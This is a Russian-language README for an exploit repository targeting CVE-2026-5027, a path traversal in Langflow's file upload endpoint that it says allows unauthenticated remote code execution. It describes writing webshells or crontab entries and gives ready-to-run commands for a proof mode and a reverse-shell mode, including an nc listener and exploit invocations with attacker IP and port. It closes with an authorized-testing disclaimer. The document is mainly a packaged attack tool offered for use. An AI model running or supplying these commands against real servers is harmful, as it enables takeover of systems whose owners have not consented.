
CVE-2026-5027
Произвольная запись файла для RCE
Неаутентифицированное удаленное выполнение кода через загрузку файла
Langflow страдает от критической уязвимости обхода пути в конечной точке загрузки файлов (POST /api/v2/files).
Атакующий может отправить вредоносное имя файла, содержащее последовательности ../, чтобы записать произвольные файлы в любом месте файловой системы сервера.
Это легко приводит к полному удаленному выполнению кода (RCE) — например, путем размещения веб-шелла или внедрения в crontab.
/tmp)python3 CVE-2026-5027.py -t http://target:7860/ --proof
Ожидаемый вывод при уязвимости:
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
# Start listener
nc -lvnp 4444
# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
| Файл | Описание |
|---|---|
CVE-2026-5027.py | Основной эксплойт на Python (PoC + RCE) |
CVE-2026-5027.yaml | Шаблон Nuclei для сканирования |
README.md | Этот файл |
Режим Proof
python3 CVE-2026-5027.py -t http://target.com/ --proof
Режим Reverse Shell
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
Этот репозиторий предназначен только для образовательных и авторизованных целей тестирования безопасности.
Используйте ответственно и только на системах, на которые у вас есть явное разрешение на тестирование.
Сделано с ❤️ для сообщества red team